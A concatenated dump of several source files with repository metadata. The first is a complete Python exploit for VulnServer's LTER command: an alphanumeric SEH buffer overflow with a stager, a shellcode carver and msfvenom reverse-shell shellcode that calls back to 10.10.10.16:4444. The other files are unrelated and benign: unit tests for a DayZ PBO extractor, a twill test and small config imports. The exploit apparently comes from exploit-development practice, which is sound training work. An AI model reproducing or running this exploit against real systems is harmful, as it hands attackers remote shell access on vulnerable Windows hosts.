33deae1e501b724f49441c6f27db168d3e4d72ae | 11,000 | py | Python | VulnServer/LTER/exploit_seh.py | cwinfosec/practice | c0010258799aa5c9f9e5cccec2ba8515b8424771 | [
"MIT"
] | 1 | 2020-10-03T07:57:42.000Z | 2020-10-03T07:57:42.000Z | VulnServer/LTER/exploit_seh.py | cwinfosec/practice | c0010258799aa5c9f9e5cccec2ba8515b8424771 | [
"MIT"
] | null | null | null | VulnServer/LTER/exploit_seh.py | cwinfosec/practice | c0010258799aa5c9f9e5cccec2ba8515b8424771 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
Description: AlphaNumeric Buffer Overflow (SEH) w/ shellcode carver via "LTER" in VulnServer
Author: Cody Winkler
Contact: @cwinfosec (twitter)
Date: 11/15/2019
Tested On: Windows XP SP2 EN
[+] Usage: python expoit.py <IP> <PORT>
$ python exploit_seh.py 127.0.0.1 9999
"""
import socket
from struct import pack
import sys
host = sys.argv[1]
port = int(sys.argv[2])
# End of D's BEFFFF
# Beginning of A's BEF230
# A's offset: DBF (-3519 bytes)
# ESP offset from D's: 11AF (-4527 bytes)
stager = "\x54\x58" # push esp, pop eax
stager += "\x66\x05\x7f\x11" # add ax, 0x1170 | 4464 bytes
stager += "\x50\x5c" # push eax, pop esp
# Long backjump shellcode carver generated with SLink
jmp2buff = ""
jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
jmp2buff += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
jmp2buff += "\x05\x77\x62\x41\x41" ## add eax, 0x41416277
jmp2buff += "\x05\x66\x62\x41\x41" ## add eax, 0x41416266
jmp2buff += "\x05\x55\x42\x41\x41" ## add eax, 0x41414255
jmp2buff += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
jmp2buff += "\x50" ## push eax
jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
jmp2buff += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
jmp2buff += "\x05\x42\x07\x45\x62" ## add eax, 0x62450742
jmp2buff += "\x05\x41\x06\x44\x61" ## add eax, 0x61440641
jmp2buff += "\x50" ## push eax
jmp2buff += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
jmp2buff += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
jmp2buff += "\x05\x32\x34\x33\x17" ## add eax, 0x17333432
jmp2buff += "\x05\x22\x24\x33\x16" ## add eax, 0x16332422
jmp2buff += "\x50\x44" ## push eax
# msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=10.10.10.16 LPORT=4444 -b '\x00' -e x86/alpha_mixed BufferRegister=ebx -f c
# Shellcode has to be ASCII-friendly or else it will die
shellcode = ("\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x6b\x4c\x39\x78\x4c\x42\x47\x70"
"\x33\x30\x45\x50\x71\x70\x6b\x39\x7a\x45\x66\x51\x59\x50\x53"
"\x54\x6e\x6b\x46\x30\x54\x70\x6e\x6b\x61\x42\x56\x6c\x6e\x6b"
"\x51\x42\x57\x64\x6e\x6b\x54\x32\x44\x68\x76\x6f\x48\x37\x63"
"\x7a\x77\x56\x66\x51\x39\x6f\x6c\x6c\x77\x4c\x30\x61\x31\x6c"
"\x54\x42\x76\x4c\x71\x30\x79\x51\x68\x4f\x44\x4d\x37\x71\x79"
"\x57\x59\x72\x49\x62\x53\x62\x52\x77\x6c\x4b\x70\x52\x52\x30"
"\x6e\x6b\x70\x4a\x45\x6c\x4c\x4b\x52\x6c\x32\x31\x30\x78\x4a"
"\x43\x53\x78\x75\x51\x7a\x71\x56\x31\x4e\x6b\x70\x59\x51\x30"
"\x37\x71\x78\x53\x4e\x6b\x73\x79\x32\x38\x48\x63\x34\x7a\x43"
"\x79\x6c\x4b\x65\x64\x6e\x6b\x43\x31\x7a\x76\x46\x51\x59\x6f"
"\x6c\x6c\x4b\x71\x58\x4f\x34\x4d\x75\x51\x5a\x67\x64\x78\x4d"
"\x30\x43\x45\x48\x76\x44\x43\x51\x6d\x7a\x58\x65\x6b\x61\x6d"
"\x37\x54\x33\x45\x38\x64\x62\x78\x4e\x6b\x42\x78\x74\x64\x53"
"\x31\x59\x43\x72\x46\x6c\x4b\x34\x4c\x72\x6b\x4c\x4b\x52\x78"
"\x65\x4c\x46\x61\x4a\x73\x4e\x6b\x44\x44\x4e\x6b\x53\x31\x4e"
"\x30\x6e\x69\x31\x54\x51\x34\x71\x34\x31\x4b\x73\x6b\x35\x31"
"\x32\x79\x73\x6a\x73\x61\x39\x6f\x59\x70\x63\x6f\x61\x4f\x73"
"\x6a\x6e\x6b\x67\x62\x68\x6b\x4e\x6d\x61\x4d\x70\x68\x55\x63"
"\x65\x62\x45\x50\x53\x30\x71\x78\x54\x37\x30\x73\x66\x52\x73"
"\x6f\x62\x74\x42\x48\x52\x6c\x34\x37\x37\x56\x75\x57\x6b\x4f"
"\x38\x55\x4d\x68\x6c\x50\x37\x71\x67\x70\x67\x70\x75\x79\x5a"
"\x64\x42\x74\x36\x30\x35\x38\x45\x79\x4f\x70\x70\x6b\x77\x70"
"\x39\x6f\x69\x45\x76\x30\x66\x30\x66\x30\x62\x70\x31\x50\x62"
"\x70\x47\x30\x70\x50\x75\x38\x78\x6a\x46\x6f\x6b\x6f\x79\x70"
"\x6b\x4f\x7a\x75\x4f\x67\x70\x6a\x37\x75\x62\x48\x74\x4a\x67"
"\x7a\x45\x5a\x74\x50\x72\x48\x76\x62\x65\x50\x37\x61\x43\x6c"
"\x6d\x59\x49\x76\x52\x4a\x46\x70\x32\x76\x61\x47\x43\x58\x6f"
"\x69\x39\x35\x52\x54\x35\x31\x4b\x4f\x4e\x35\x6b\x35\x4b\x70"
"\x33\x44\x36\x6c\x39\x6f\x70\x4e\x67\x78\x30\x75\x4a\x4c\x52"
"\x48\x48\x70\x78\x35\x4e\x42\x53\x66\x69\x6f\x48\x55\x55\x38"
"\x33\x53\x30\x6d\x53\x54\x73\x30\x6f\x79\x79\x73\x62\x77\x66"
"\x37\x32\x77\x56\x51\x59\x66\x33\x5a\x57\x62\x36\x39\x52\x76"
"\x69\x72\x49\x6d\x43\x56\x5a\x67\x32\x64\x66\x44\x35\x6c\x37"
"\x71\x33\x31\x4c\x4d\x71\x54\x46\x44\x66\x70\x4f\x36\x67\x70"
"\x42\x64\x30\x54\x32\x70\x30\x56\x33\x66\x53\x66\x71\x56\x43"
"\x66\x42\x6e\x50\x56\x76\x36\x73\x63\x71\x46\x42\x48\x74\x39"
"\x58\x4c\x77\x4f\x6b\x36\x39\x6f\x58\x55\x6c\x49\x6d\x30\x50"
"\x4e\x56\x36\x51\x56\x59\x6f\x74\x70\x53\x58\x63\x38\x4c\x47"
"\x57\x6d\x71\x70\x49\x6f\x4a\x75\x6f\x4b\x4d\x30\x75\x4d\x35"
"\x7a\x35\x5a\x63\x58\x6c\x66\x4a\x35\x4d\x6d\x6f\x6d\x49\x6f"
"\x4a\x75\x75\x6c\x56\x66\x61\x6c\x54\x4a\x4d\x50\x39\x6b\x79"
"\x70\x43\x45\x63\x35\x6d\x6b\x72\x67\x72\x33\x50\x72\x62\x4f"
"\x73\x5a\x35\x50\x53\x63\x49\x6f\x38\x55\x41\x41")
# Overflowed with lter.spk "LTER /.:/(EIP @ 3520 A's)"
# NSEH overwritten at 3495
# SEH overwritten at 3499
seh = pack("<I", 0x6250172B)
nseh = "\x43\x43\x75\xff"
buffer = "LTER /.:/"
buffer += "A"*12
buffer += shellcode
buffer += "A"*(3495-124-12-len(shellcode))
buffer += stager
buffer += jmp2buff
buffer += "A"*(124-len(stager)-len(jmp2buff))
buffer += nseh
buffer += seh
buffer += "D"*(1000-len(nseh)-len(seh))
try:
print "[+] Connecting to target"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
print "[+] Sent payload with length: %d" % len(buffer)
s.send(buffer)
s.close()
except:
print "[-] Something went wrong :(" | 85.271318 | 238 | 0.347455 | 1,099 | 11,000 | 3.472248 | 0.214741 | 0.023585 | 0.033019 | 0.040881 | 0.099843 | 0.091981 | 0.091981 | 0.091981 | 0.091981 | 0.091981 | 0 | 0.320158 | 0.54 | 11,000 | 129 | 239 | 85.271318 | 0.433992 | 0.343727 | 0 | 0.084211 | 0 | 0.494737 | 0.471493 | 0.40737 | 0 | 0 | 0.001451 | 0 | 0 | 0 | null | null | 0 | 0.031579 | null | null | 0.031579 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
33f6e00013258d05f8dada680e6300841ae4dc5c | 112 | py | Python | ufdl-core-app/src/ufdl/core_app/serialisers/models/__init__.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | ufdl-core-app/src/ufdl/core_app/serialisers/models/__init__.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | 85 | 2020-07-24T00:04:28.000Z | 2022-02-10T10:35:15.000Z | ufdl-core-app/src/ufdl/core_app/serialisers/models/__init__.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | from ._ModelSerialiser import ModelSerialiser
from ._PreTrainedModelSerialiser import PreTrainedModelSerialiser
| 37.333333 | 65 | 0.910714 | 8 | 112 | 12.5 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 112 | 2 | 66 | 56 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1d54c02d6ae7d88b5ba16135d67a74e81576b2d8 | 111 | py | Python | tests/test_http_auth.py | rickproza/twill | 7a98e4912a8ff929a94e35d35e7a027472ee4f46 | [
"MIT"
] | 13 | 2020-04-18T15:17:58.000Z | 2022-02-24T13:25:46.000Z | tests/test_http_auth.py | rickproza/twill | 7a98e4912a8ff929a94e35d35e7a027472ee4f46 | [
"MIT"
] | 5 | 2020-04-04T21:16:00.000Z | 2022-02-10T00:26:20.000Z | tests/test_http_auth.py | rickproza/twill | 7a98e4912a8ff929a94e35d35e7a027472ee4f46 | [
"MIT"
] | 3 | 2020-06-06T17:26:19.000Z | 2022-02-10T00:30:39.000Z | from .utils import execute_script
def test(url):
execute_script('test_http_auth.twill', initial_url=url)
| 18.5 | 59 | 0.774775 | 17 | 111 | 4.764706 | 0.705882 | 0.320988 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126126 | 111 | 5 | 60 | 22.2 | 0.835052 | 0 | 0 | 0 | 0 | 0 | 0.18018 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1d609d2ce29f4212fae2f904bd517be106c53d2c | 17,571 | py | Python | tests/test_extract_pbo.py | tjensen/dayz-dev-tools | e88c7f4d169778737f2299b6cb10dac9b1a29127 | [
"MIT"
] | 4 | 2021-07-26T00:27:01.000Z | 2022-03-20T16:39:42.000Z | tests/test_extract_pbo.py | tjensen/dayz-dev-tools | e88c7f4d169778737f2299b6cb10dac9b1a29127 | [
"MIT"
] | 19 | 2021-08-04T21:56:12.000Z | 2022-02-27T22:25:19.000Z | tests/test_extract_pbo.py | tjensen/dayz-dev-tools | e88c7f4d169778737f2299b6cb10dac9b1a29127 | [
"MIT"
] | 2 | 2021-09-17T01:11:44.000Z | 2022-01-28T16:43:01.000Z | import os
import typing
import unittest
from unittest import mock
from dayz_dev_tools import extract_pbo
from dayz_dev_tools import pbo_file
class TestExtractPbo(unittest.TestCase):
def setUp(self) -> None:
super().setUp()
self.mock_pboreader = mock.Mock()
self.mock_pboreader.prefix.return_value = None
makedirs_patcher = mock.patch("os.makedirs")
self.mock_makedirs = makedirs_patcher.start()
self.addCleanup(makedirs_patcher.stop)
bin_to_cpp_patcher = mock.patch("dayz_dev_tools.config_cpp.bin_to_cpp")
self.mock_bin_to_cpp = bin_to_cpp_patcher.start()
self.addCleanup(bin_to_cpp_patcher.stop)
def create_mock_file(self, filename: bytes, contents: bytes) -> pbo_file.PBOFile:
def unpack(dest: typing.BinaryIO) -> None:
dest.write(contents)
mock_file = pbo_file.PBOFile(filename, b"", 0, 0, 0, 0)
mock.patch.object(mock_file, "unpack", side_effect=unpack).start()
return mock_file
def test_extracts_all_files_in_the_pbo(self) -> None:
mock_open = mock.mock_open()
self.mock_pboreader.files.return_value = [
self.create_mock_file(b"dir1\\dir2\\filename.ext", b"1111"),
self.create_mock_file(b"dir1\\filename.ext", b"2222"),
self.create_mock_file(b"dir1\\dir2\\dir3\\filename.ext", b"3333"),
self.create_mock_file(b"filename.ext", b"4444"),
self.create_mock_file(b"other-filename.png", b"5555")
]
with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
extract_pbo.extract_pbo(
self.mock_pboreader, [], verbose=False, deobfuscate=False, cfgconvert=None)
mock_print.assert_not_called()
self.mock_pboreader.files.assert_called_once_with()
assert self.mock_makedirs.call_count == 3
self.mock_makedirs.assert_has_calls([
mock.call(os.path.join(b"dir1", b"dir2"), exist_ok=True),
mock.call(os.path.join(b"dir1"), exist_ok=True),
mock.call(os.path.join(b"dir1", b"dir2", b"dir3"), exist_ok=True)
])
assert mock_open.call_count == 5
mock_open.assert_has_calls([
mock.call(os.path.join(b"dir1", b"dir2", b"filename.ext"), "w+b"),
mock.call(os.path.join(b"dir1", b"filename.ext"), "w+b"),
mock.call(os.path.join(b"dir1", b"dir2", b"dir3", b"filename.ext"), "w+b"),
mock.call(os.path.join(b"filename.ext"), "w+b"),
mock.call(os.path.join(b"other-filename.png"), "w+b")
], any_order=True)
mock_open.return_value.__enter__.return_value.write.assert_has_calls([
mock.call(b"1111"),
mock.call(b"2222"),
mock.call(b"3333"),
mock.call(b"4444"),
mock.call(b"5555")
])
def test_extracts_specified_files_when_provided(self) -> None:
mock_open = mock.mock_open()
self.mock_pboreader.file.side_effect = [
self.create_mock_file(b"filename.ext", b"4444"),
self.create_mock_file(b"dir1\\filename.ext", b"2222")
]
with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
extract_pbo.extract_pbo(
self.mock_pboreader,
[
os.path.join("filename.ext"),
os.path.join("dir1", "filename.ext")
],
verbose=False, deobfuscate=False, cfgconvert=None)
mock_print.assert_not_called()
assert self.mock_pboreader.file.call_count == 2
self.mock_pboreader.file.assert_has_calls([
mock.call(os.path.join("filename.ext")),
mock.call(os.path.join("dir1", "filename.ext"))
])
assert self.mock_makedirs.call_count == 1
self.mock_makedirs.assert_called_once_with(b"dir1", exist_ok=True)
assert mock_open.call_count == 2
mock_open.assert_has_calls([
mock.call(os.path.join(b"filename.ext"), "w+b"),
mock.call(os.path.join(b"dir1", b"filename.ext"), "w+b")
], any_order=True)
mock_open.return_value.__enter__.return_value.write.assert_has_calls([
mock.call(b"4444"),
mock.call(b"2222")
])
def test_raises_if_specified_filename_does_not_exist(self) -> None:
self.mock_pboreader.file.return_value = None
with self.assertRaises(Exception):
extract_pbo.extract_pbo(
self.mock_pboreader,
[
os.path.join("filename.ext"),
os.path.join("dir1", "filename.ext")
],
verbose=False, deobfuscate=False, cfgconvert=None)
self.mock_pboreader.file.assert_called_once()
self.mock_makedirs.assert_not_called()
def test_prints_filenames_as_they_are_extracted_when_verbose_is_true(self) -> None:
mock_open = mock.mock_open()
self.mock_pboreader.files.return_value = [
self.create_mock_file(b"dir1\\dir2\\filename.ext", b"1111"),
self.create_mock_file(b"dir1\\filename.ext", b"2222"),
self.create_mock_file(b"dir1\\dir2\\dir3\\filename.ext", b"3333"),
self.create_mock_file(b"filename.ext", b"4444"),
self.create_mock_file(b"other-filename.png", b"5555")
]
with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
extract_pbo.extract_pbo(
self.mock_pboreader, [], verbose=True, deobfuscate=False, cfgconvert=None)
assert mock_print.call_count == 5
mock_print.assert_has_calls([
mock.call(f"Extracting {os.path.join('dir1', 'dir2', 'filename.ext')}"),
mock.call(f"Extracting {os.path.join('dir1', 'filename.ext')}"),
mock.call(f"Extracting {os.path.join('dir1', 'dir2', 'dir3', 'filename.ext')}"),
mock.call("Extracting filename.ext"),
mock.call("Extracting other-filename.png")
])
def test_prints_specified_filenames_as_they_are_extracted_when_verbose_is_true(self) -> None:
mock_open = mock.mock_open()
self.mock_pboreader.file.side_effect = [
self.create_mock_file(b"filename.ext", b"4444"),
self.create_mock_file(b"dir1\\filename.ext", b"2222")
]
with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
extract_pbo.extract_pbo(
self.mock_pboreader,
[
os.path.join("filename.ext"),
os.path.join("dir1", "filename.ext")
],
verbose=True, deobfuscate=False, cfgconvert=None)
assert mock_print.call_count == 2
mock_print.assert_has_calls([
mock.call("Extracting filename.ext"),
mock.call(f"Extracting {os.path.join('dir1', 'filename.ext')}")
])
def test_deobfuscates_all_obfuscated_files_when_requested(self) -> None:
mock_open = mock.mock_open()
mock_files = [
self.create_mock_file(b"obfuscated1", b"//***\r\n#include \"not-obfuscated1\"\r\n"),
self.create_mock_file(
b"obfuscated2",
b"/*\r\n#pragma \"whatever\"\r\n*/\r\n#include \"not-obfuscated2\"\r\n"),
self.create_mock_file(b"obfuscated3", b"#include \"not-obfuscated3\"\r\n"),
self.create_mock_file(b"not-obfuscated1", b"NOT OBFUSCATED CONTENT 1"),
self.create_mock_file(b"not-obfuscated2", b"NOT OBFUSCATED CONTENT 2"),
self.create_mock_file(b"not-obfuscated3", b"NOT OBFUSCATED CONTENT 3")
]
self.mock_pboreader.files.return_value = mock_files
self.mock_pboreader.file.side_effect = mock_files[3:]
with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
extract_pbo.extract_pbo(
self.mock_pboreader, [], verbose=False, deobfuscate=True, cfgconvert=None)
mock_print.assert_not_called()
assert mock_open.call_count == 3
mock_open.assert_has_calls([
mock.call(b"obfuscated1", "w+b"),
mock.call(b"obfuscated2", "w+b"),
mock.call(b"obfuscated3", "w+b")
], any_order=True)
mock_open.return_value.__enter__.return_value.write.assert_has_calls([
mock.call(b"NOT OBFUSCATED CONTENT 1"),
mock.call(b"NOT OBFUSCATED CONTENT 2"),
mock.call(b"NOT OBFUSCATED CONTENT 3")
])
assert self.mock_pboreader.file.call_count == 3
self.mock_pboreader.file.assert_has_calls([
mock.call(b"not-obfuscated1"),
mock.call(b"not-obfuscated2"),
mock.call(b"not-obfuscated3")
])
def test_deobfuscates_obfuscated_files_when_target_file_does_not_have_prefix(self) -> None:
mock_open = mock.mock_open()
self.mock_pboreader.files.return_value = [
self.create_mock_file(b"obfuscated", b"#include \"not-obfuscated\"\r\n"),
]
self.mock_pboreader.file.return_value = \
self.create_mock_file(b"PREFIX\\not-obfuscated", b"NOT OBFUSCATED CONTENT")
self.mock_pboreader.prefix.return_value = b"PREFIX"
with mock.patch("builtins.open", mock_open):
extract_pbo.extract_pbo(
self.mock_pboreader, [], verbose=False, deobfuscate=True, cfgconvert=None)
mock_open.return_value.__enter__.return_value.write.assert_called_once_with(
b"NOT OBFUSCATED CONTENT"),
self.mock_pboreader.file.assert_called_once_with(b"PREFIX\\not-obfuscated")
def test_prints_skipped_files_when_deobfuscating(self) -> None:
mock_open = mock.mock_open()
mock_files = [
self.create_mock_file(b"obfuscated1", b"//***\r\n#include \"not-obfuscated1\"\r\n"),
self.create_mock_file(
b"obfuscated2",
b"/*\r\n#pragma \"whatever\"\r\n*/\r\n#include \"not-obfuscated2\"\r\n"),
self.create_mock_file(b"not-obfuscated1", b"NOT OBFUSCATED CONTENT 1"),
self.create_mock_file(b"not-obfuscated2", b"NOT OBFUSCATED CONTENT 2")
]
self.mock_pboreader.files.return_value = mock_files
self.mock_pboreader.file.side_effect = [
self.create_mock_file(b"not-obfuscated1", b"NOT OBFUSCATED CONTENT 1"),
self.create_mock_file(b"not-obfuscated2", b"NOT OBFUSCATED CONTENT 2")
]
with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
extract_pbo.extract_pbo(
self.mock_pboreader, [], verbose=True, deobfuscate=True, cfgconvert=None)
assert mock_print.call_count == 4
mock_print.assert_has_calls([
mock.call("Extracting obfuscated1"),
mock.call("Extracting obfuscated2"),
mock.call("Skipping obfuscation file: not-obfuscated1"),
mock.call("Skipping obfuscation file: not-obfuscated2")
])
def test_extracts_files_as_is_if_unobfuscated_file_cannot_be_found(self) -> None:
mock_open = mock.mock_open()
content = b"//***\r\n#include \"not-obfuscated1\"\r\n"
self.mock_pboreader.files.return_value = [
self.create_mock_file(b"obfuscated1", content)
]
self.mock_pboreader.file.return_value = None
with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
extract_pbo.extract_pbo(
self.mock_pboreader, [], verbose=False, deobfuscate=True, cfgconvert=None)
mock_print.assert_not_called()
mock_open.assert_called_once_with(b"obfuscated1", "w+b")
mock_open.return_value.__enter__.return_value.write.assert_called_once_with(content)
self.mock_pboreader.file.assert_called_once_with(b"not-obfuscated1")
def test_reports_missing_unobfuscated_file_when_verbose_enabled(self) -> None:
mock_open = mock.mock_open()
content = b"//***\r\n#include \"not-obfuscated1\"\r\n"
self.mock_pboreader.files.return_value = [
self.create_mock_file(b"obfuscated1", content)
]
self.mock_pboreader.file.return_value = None
with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
extract_pbo.extract_pbo(
self.mock_pboreader, [], verbose=True, deobfuscate=True, cfgconvert=None)
mock_print.assert_has_calls([
mock.call("Unable to deobfuscate obfuscated1")
])
mock_open.assert_called_once_with(b"obfuscated1", "w+b")
mock_open.return_value.__enter__.return_value.write.assert_called_once_with(content)
self.mock_pboreader.file.assert_called_once_with(b"not-obfuscated1")
def test_skips_invalid_obfuscation_files(self) -> None:
mock_open = mock.mock_open()
self.mock_pboreader.files.return_value = [
self.create_mock_file(b"\t\t", b""),
self.create_mock_file(b"*.*", b""),
self.create_mock_file(b"obfuscated1", b"//***\r\n#include \"not-obfuscated1\"\r\n"),
self.create_mock_file(b"file?to-skip", b""),
self.create_mock_file(b"another-file-to*skip", b""),
self.create_mock_file(b"yet-another-file\tto-skip", b""),
self.create_mock_file(b"high-ascii-characters\xccare-also-skipped", b""),
]
self.mock_pboreader.file.return_value = \
self.create_mock_file(b"not-obfuscated1", b"NOT OBFUSCATED CONTENT 1")
with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
extract_pbo.extract_pbo(
self.mock_pboreader, [], verbose=False, deobfuscate=True, cfgconvert=None)
mock_print.assert_not_called()
mock_open.assert_called_once_with(b"obfuscated1", "w+b")
mock_open.return_value.__enter__.return_value.write.assert_called_once_with(
b"NOT OBFUSCATED CONTENT 1"),
self.mock_pboreader.file.assert_called_once_with(b"not-obfuscated1")
def test_does_not_convert_config_bin_files_when_cfgconvert_is_none(self) -> None:
mock_open = mock.mock_open()
self.mock_pboreader.files.return_value = [
self.create_mock_file(b"dir1\\config.bin", b"1111")
]
with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
extract_pbo.extract_pbo(
self.mock_pboreader, [], verbose=False, deobfuscate=False, cfgconvert=None)
mock_print.assert_not_called()
self.mock_bin_to_cpp.assert_not_called()
mock_open.assert_called_once_with(os.path.join(b"dir1", b"config.bin"), "w+b")
mock_open.return_value.__enter__.return_value.write.assert_called_once_with(b"1111")
def test_converts_config_bin_files_when_cfgconvert_is_not_none(self) -> None:
self.mock_bin_to_cpp.return_value = b"CPP-CONTENT"
mock_open = mock.mock_open()
self.mock_pboreader.files.return_value = [
self.create_mock_file(b"dir1\\config.bin", b"1111")
]
with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
extract_pbo.extract_pbo(
self.mock_pboreader, [], verbose=False, deobfuscate=False,
cfgconvert="cppconvert.exe")
mock_print.assert_not_called()
self.mock_bin_to_cpp.assert_called_once_with(b"1111", "cppconvert.exe")
mock_open.assert_called_once_with(os.path.join("dir1", "config.cpp"), "w+b")
mock_open.return_value.__enter__.return_value.write.assert_called_once_with(b"CPP-CONTENT")
def test_extracts_unconverted_config_bin_if_convert_to_config_cpp_fails(self) -> None:
self.mock_bin_to_cpp.side_effect = Exception("cfgconvert error")
mock_open = mock.mock_open()
self.mock_pboreader.files.return_value = [
self.create_mock_file(b"dir1\\config.bin", b"1111")
]
with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
extract_pbo.extract_pbo(
self.mock_pboreader, [], verbose=False, deobfuscate=False,
cfgconvert="cppconvert.exe")
mock_print.assert_called_once_with(
f"Failed to convert {os.path.join('dir1', 'config.bin')}: cfgconvert error")
self.mock_bin_to_cpp.assert_called_once_with(b"1111", "cppconvert.exe")
mock_open.assert_called_once_with(os.path.join(b"dir1", b"config.bin"), "w+b")
mock_open.return_value.__enter__.return_value.write.assert_called_once_with(b"1111")
def test_prints_when_converting_config_bin_files(self) -> None:
self.mock_bin_to_cpp.return_value = b"CPP-CONTENT"
mock_open = mock.mock_open()
self.mock_pboreader.files.return_value = [
self.create_mock_file(b"dir1\\config.bin", b"1111")
]
with mock.patch("builtins.print") as mock_print, mock.patch("builtins.open", mock_open):
extract_pbo.extract_pbo(
self.mock_pboreader, [], verbose=True, deobfuscate=False,
cfgconvert="cppconvert.exe")
mock_print.assert_called_once_with(
f"Converting {os.path.join('dir1', 'config.bin')}"
f" -> {os.path.join('dir1', 'config.cpp')}")
| 43.492574 | 99 | 0.639235 | 2,303 | 17,571 | 4.593574 | 0.06904 | 0.048398 | 0.078741 | 0.071462 | 0.830324 | 0.809528 | 0.765668 | 0.730126 | 0.710086 | 0.691559 | 0 | 0.017248 | 0.231176 | 17,571 | 403 | 100 | 43.600496 | 0.76586 | 0 | 0 | 0.579937 | 0 | 0.003135 | 0.172159 | 0.022822 | 0 | 0 | 0 | 0 | 0.178683 | 1 | 0.056426 | false | 0 | 0.018809 | 0 | 0.081505 | 0.103448 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1d63641a97a0d39f7674465f5c6c4c10dfa8fba4 | 254 | py | Python | DiffractiveForwardAnalysis/Configuration/python/DiffractiveForwardAnalysis_SkimPaths_cff.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 6 | 2017-09-08T14:12:56.000Z | 2022-03-09T23:57:01.000Z | DiffractiveForwardAnalysis/Configuration/python/DiffractiveForwardAnalysis_SkimPaths_cff.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 545 | 2017-09-19T17:10:19.000Z | 2022-03-07T16:55:27.000Z | DiffractiveForwardAnalysis/Configuration/python/DiffractiveForwardAnalysis_SkimPaths_cff.py | SWuchterl/cmssw | 769b4a7ef81796579af7d626da6039dfa0347b8e | [
"Apache-2.0"
] | 14 | 2017-10-04T09:47:21.000Z | 2019-10-23T18:04:45.000Z | import FWCore.ParameterSet.Config as cms
# Diffraction and Forward Physics group Skim sequences
from DiffractiveForwardAnalysis.Skimming.gammagammaEE_SkimPaths_cff import *
from DiffractiveForwardAnalysis.Skimming.gammagammaMuMu_SkimPaths_cff import *
| 36.285714 | 78 | 0.877953 | 27 | 254 | 8.111111 | 0.740741 | 0.273973 | 0.347032 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086614 | 254 | 6 | 79 | 42.333333 | 0.943966 | 0.204724 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
